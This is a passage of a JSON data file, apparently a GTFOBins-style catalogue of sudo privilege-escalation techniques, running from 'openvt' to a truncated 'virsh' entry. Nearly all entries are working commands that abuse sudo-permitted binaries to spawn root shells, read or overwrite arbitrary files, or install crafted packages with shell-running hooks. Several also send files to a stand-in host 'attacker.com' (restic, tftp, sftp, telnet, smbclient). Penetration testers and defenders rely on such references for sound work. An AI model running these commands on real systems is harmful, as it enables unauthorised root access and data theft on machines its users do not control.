} ], "openvt": [ { "code": "COMMAND=id\nTF=$(mktemp -u)\nsudo openvt -- sh -c \"$COMMAND >$TF 2>&1\"\ncat $TF\n", "description": "The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file." } ], "opkg": [ { "code": "sudo opkg install x_1.0_all.deb\n", "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n" } ], "pandoc": [ { "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' >$TF\nsudo pandoc -L $TF /dev/null\n", "description": "Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply." } ], "paste": [ { "code": "LFILE=file_to_read\nsudo paste $LFILE\n" } ], "pdb": [ { "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n" } ], "pdflatex": [ { "code": "sudo pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\npdftotext article.pdf -\n", "description": "The read file will be part of the output." 
}, { "code": "sudo pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n" } ], "pdftex": [ { "code": "sudo pdftex --shell-escape '\\write18{/bin/sh}\\end'\n" } ], "perf": [ { "code": "sudo perf stat /bin/sh\n" } ], "perl": [ { "code": "sudo perl -e 'exec \"/bin/sh\";'" } ], "perlbug": [ { "code": "sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'" } ], "pexec": [ { "code": "sudo pexec /bin/sh" } ], "pg": [ { "code": "sudo pg /etc/profile\n!/bin/sh\n" } ], "php": [ { "code": "CMD=\"/bin/sh\"\nsudo php -r \"system('$CMD');\"\n" } ], "pic": [ { "code": "sudo pic -U\n.PS\nsh X sh X\n" } ], "pico": [ { "code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n" } ], "pidstat": [ { "code": "COMMAND=id\nsudo pidstat -e $COMMAND\n" } ], "pip": [ { "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n" } ], "pkexec": [ { "code": "sudo pkexec /bin/sh" } ], "pkg": [ { "code": "sudo pkg install -y --no-repo-update ./x-1.0.txz\n", "description": "It runs commands using a specially crafted FreeBSD package. 
Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF\n```\n" } ], "posh": [ { "code": "sudo posh" } ], "pr": [ { "code": "LFILE=file_to_read\npr -T $LFILE\n" } ], "pry": [ { "code": "sudo pry\nsystem(\"/bin/sh\")\n" } ], "psftp": [ { "code": "sudo psftp\n!/bin/sh\n" } ], "psql": [ { "code": "psql\n\\?\n!/bin/sh\n" } ], "ptx": [ { "code": "LFILE=file_to_read\nsudo ptx -w 5000 \"$LFILE\"\n" } ], "puppet": [ { "code": "sudo puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n" } ], "pwsh": [ { "code": "sudo pwsh" } ], "python": [ { "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'" } ], "rake": [ { "code": "sudo rake -p '`/bin/sh 1>&0`'" } ], "rc": [ { "code": "sudo rc -c '/bin/sh'" } ], "readelf": [ { "code": "LFILE=file_to_read\nsudo readelf -a @$LFILE\n" } ], "red": [ { "code": "sudo red file_to_write\na\nDATA\n.\nw\nq\n" } ], "redcarpet": [ { "code": "LFILE=file_to_read\nsudo redcarpet \"$LFILE\"\n" } ], "restic": [ { "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\nsudo restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n" } ], "rev": [ { "code": "LFILE=file_to_read\nsudo rev $LFILE | rev\n" } ], "rlwrap": [ { "code": "sudo rlwrap /bin/sh" } ], "rpm": [ { "code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'" }, { "code": "sudo rpm -ivh x-1.0-1.noarch.rpm\n", "description": "It runs commands using a specially crafted RPM package. 
Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n" } ], "rpmdb": [ { "code": "sudo rpmdb --eval '%(/bin/sh 1>&2)'" } ], "rpmquery": [ { "code": "sudo rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'" } ], "rpmverify": [ { "code": "sudo rpmverify --eval '%(/bin/sh 1>&2)'" } ], "rsync": [ { "code": "sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null" } ], "ruby": [ { "code": "sudo ruby -e 'exec \"/bin/sh\"'" } ], "run-mailcap": [ { "code": "sudo run-mailcap --action=view /etc/hosts\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "run-parts": [ { "code": "sudo run-parts --new-session --regex '^sh$' /bin" } ], "runscript": [ { "code": "TF=$(mktemp)\necho '! exec /bin/sh' >$TF\nsudo runscript $TF\n" } ], "rview": [ { "code": "sudo rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo rview -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `rview` is compiled with Lua support." } ], "rvim": [ { "code": "sudo rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo rvim -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `rvim` is compiled with Lua support." 
} ], "sash": [ { "code": "sudo sash" } ], "scanmem": [ { "code": "sudo scanmem\nshell /bin/sh\n" } ], "scp": [ { "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nsudo scp -S $TF x y:\n" } ], "screen": [ { "code": "sudo screen" } ], "script": [ { "code": "sudo script -q /dev/null" } ], "scrot": [ { "code": "sudo scrot -e /bin/sh" } ], "sed": [ { "code": "sudo sed -n '1e exec sh 1>&0' /etc/hosts", "description": "GNU version only. Also, this requires `bash`." } ], "service": [ { "code": "sudo service ../../bin/sh" } ], "setarch": [ { "code": "sudo setarch $(arch) /bin/sh" } ], "setfacl": [ { "code": "LFILE=file_to_change\nUSER=somebody\nsudo setfacl -m -u:$USER:rwx $LFILE\n" } ], "setlock": [ { "code": "sudo setlock - /bin/sh" } ], "sftp": [ { "code": "HOST=user@attacker.com\nsudo sftp $HOST\n!/bin/sh\n" } ], "sg": [ { "code": "sudo sg root\n" } ], "shuf": [ { "code": "LFILE=file_to_write\nsudo shuf -e DATA -o \"$LFILE\"\n", "description": "The written file content is corrupted by adding a newline." } ], "slsh": [ { "code": "sudo slsh -e 'system(\"/bin/sh\")'" } ], "smbclient": [ { "code": "sudo smbclient '\\\\attacker\\share'\n!/bin/sh\n" } ], "snap": [ { "code": "sudo snap install xxxx_1.0_all.snap --dangerous --devmode\n", "description": "It runs commands using a specially crafted Snap package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nCOMMAND=id\ncd $(mktemp -d)\nmkdir -p meta/hooks\nprintf '#!/bin/sh\\n%s; false' \"$COMMAND\" >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```\n" } ], "socat": [ { "code": "sudo socat stdin exec:/bin/sh\n", "description": "The resulting shell is not a proper TTY shell and lacks the prompt." 
} ], "soelim": [ { "code": "LFILE=file_to_read\nsudo soelim \"$LFILE\"\n" } ], "softlimit": [ { "code": "sudo softlimit /bin/sh" } ], "sort": [ { "code": "LFILE=file_to_read\nsudo sort -m \"$LFILE\"\n" } ], "split": [ { "code": "sudo split --filter=/bin/sh /dev/stdin\n", "description": "The shell prompt is not printed." } ], "sqlite3": [ { "code": "sudo sqlite3 /dev/null '.shell /bin/sh'" } ], "sqlmap": [ { "code": "sudo sqlmap -u 127.0.0.1 --eval=\"import os; os.system('/bin/sh')\"" } ], "ss": [ { "code": "LFILE=file_to_read\nsudo ss -a -F $LFILE\n" } ], "ssh": [ { "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x", "description": "Spawn interactive root shell through ProxyCommand option." } ], "ssh-agent": [ { "code": "sudo ssh-agent /bin/" } ], "ssh-keygen": [ { "code": "sudo ssh-keygen -D ./lib.so", "description": "" } ], "ssh-keyscan": [ { "code": "LFILE=file_to_read\nsudo ssh-keyscan -f $LFILE\n" } ], "sshpass": [ { "code": "sudo sshpass /bin/sh" } ], "start-stop-daemon": [ { "code": "sudo start-stop-daemon -n $RANDOM -S -x /bin/sh" } ], "stdbuf": [ { "code": "sudo stdbuf -i0 /bin/sh" } ], "strace": [ { "code": "sudo strace -o /dev/null /bin/sh" } ], "strings": [ { "code": "LFILE=file_to_read\nsudo strings \"$LFILE\"\n" } ], "su": [ { "code": "sudo su" } ], "sudo": [ { "code": "sudo sudo /bin/sh" } ], "sysctl": [ { "code": "COMMAND='/bin/sh -c id>/tmp/id'\nsudo sysctl \"kernel.core_pattern=|$COMMAND\"\nsleep 9999 &\nkill -QUIT $!\ncat /tmp/id\n" } ], "systemctl": [ { "code": "TF=$(mktemp)\necho /bin/sh >$TF\nchmod +x $TF\nsudo SYSTEMD_EDITOR=$TF systemctl edit system.slice\n" }, { "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nsudo systemctl link $TF\nsudo systemctl enable --now $TF\n" }, { "code": "sudo systemctl\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." 
} ], "systemd-resolve": [ { "code": "sudo systemd-resolve --status\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "tac": [ { "code": "LFILE=file_to_read\nsudo tac -s 'RANDOM' \"$LFILE\"\n" } ], "tail": [ { "code": "LFILE=file_to_read\nsudo tail -c1G \"$LFILE\"\n" } ], "tar": [ { "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" } ], "task": [ { "code": "sudo task execute /bin/sh" } ], "taskset": [ { "code": "sudo taskset 1 /bin/sh" } ], "tasksh": [ { "code": "sudo tasksh\n!/bin/sh\n" } ], "tbl": [ { "code": "LFILE=file_to_read\nsudo tbl $LFILE\n" } ], "tclsh": [ { "code": "sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n" } ], "tcpdump": [ { "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root\n" } ], "tdbtool": [ { "code": "sudo tdbtool\n! /bin/sh\n" } ], "tee": [ { "code": "LFILE=file_to_write\necho DATA | sudo tee -a \"$LFILE\"\n" } ], "telnet": [ { "code": "RHOST=attacker.com\nRPORT=12345\nsudo telnet $RHOST $RPORT\n^]\n!/bin/sh\n", "description": "BSD version only. Needs to be connected first." } ], "terraform": [ { "code": "sudo terraform console\nfile(\"file_to_read\")\n" } ], "tex": [ { "code": "sudo tex --shell-escape '\\write18{/bin/sh}\\end'\n" } ], "tftp": [ { "code": "RHOST=attacker.com\nsudo tftp $RHOST\nput file_to_send\n", "description": "Send local file to a TFTP server." 
} ], "tic": [ { "code": "LFILE=file_to_read\nsudo tic -C \"$LFILE\"\n" } ], "time": [ { "code": "sudo /usr/bin/time /bin/sh" } ], "timedatectl": [ { "code": "sudo timedatectl list-timezones\n!/bin/sh\n" } ], "timeout": [ { "code": "sudo timeout --foreground 7d /bin/sh" } ], "tmate": [ { "code": "sudo tmate -c /bin/sh" } ], "tmux": [ { "code": "sudo tmux" } ], "top": [ { "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n", "description": "This requires that the root configuration file is writable and might be used to persist elevated privileges." } ], "torify": [ { "code": "sudo torify /bin/sh" } ], "torsocks": [ { "code": "sudo torsocks /bin/sh" } ], "troff": [ { "code": "LFILE=file_to_read\nsudo troff $LFILE\n" } ], "ul": [ { "code": "LFILE=file_to_read\nsudo ul \"$LFILE\"\n" } ], "unexpand": [ { "code": "LFILE=file_to_read\nsudo unexpand -t99999999 \"$LFILE\"\n" } ], "uniq": [ { "code": "LFILE=file_to_read\nsudo uniq \"$LFILE\"\n" } ], "unshare": [ { "code": "sudo unshare /bin/sh" } ], "unsquashfs": [ { "code": "sudo unsquashfs shell\n./squashfs-root/sh -p\n" } ], "unzip": [ { "code": "sudo unzip -K shell.zip\n./sh -p\n" } ], "update-alternatives": [ { "code": "LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\nsudo update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n", "description": "Write in `$LFILE` a symlink to `$TF`." 
} ], "uudecode": [ { "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n" } ], "uuencode": [ { "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n" } ], "vagrant": [ { "code": "cd $(mktemp -d)\necho 'exec \"/bin/sh\"' > Vagrantfile\nvagrant up\n" } ], "valgrind": [ { "code": "sudo valgrind /bin/sh" } ], "varnishncsa": [ { "code": "LFILE=file_to_write\nsudo varnishncsa -g request -q 'ReqURL ~ \"/xxx\"' -F '%{yyy}i' -w \"$LFILE\"\n" } ], "vi": [ { "code": "sudo vi -c ':!/bin/sh' /dev/null" } ], "view": [ { "code": "sudo view -c ':!/bin/sh'" }, { "code": "sudo view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo view -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `view` is compiled with Lua support." } ], "vigr": [ { "code": "sudo vigr" } ], "vim": [ { "code": "sudo vim -c ':!/bin/sh'" }, { "code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `vim` is compiled with Lua support." } ], "vimdiff": [ { "code": "sudo vimdiff -c ':!/bin/sh'" }, { "code": "sudo vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo vimdiff -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `vimdiff` is compiled with Lua support." } ], "vipw": [ { "code": "sudo vipw" } ], "virsh": [ { "code": "SCRIPT=script_to_run\nTF=$(mktemp)\ncat > $TF << EOF\n\n x\n \n hvm\n \n 1\n \n \n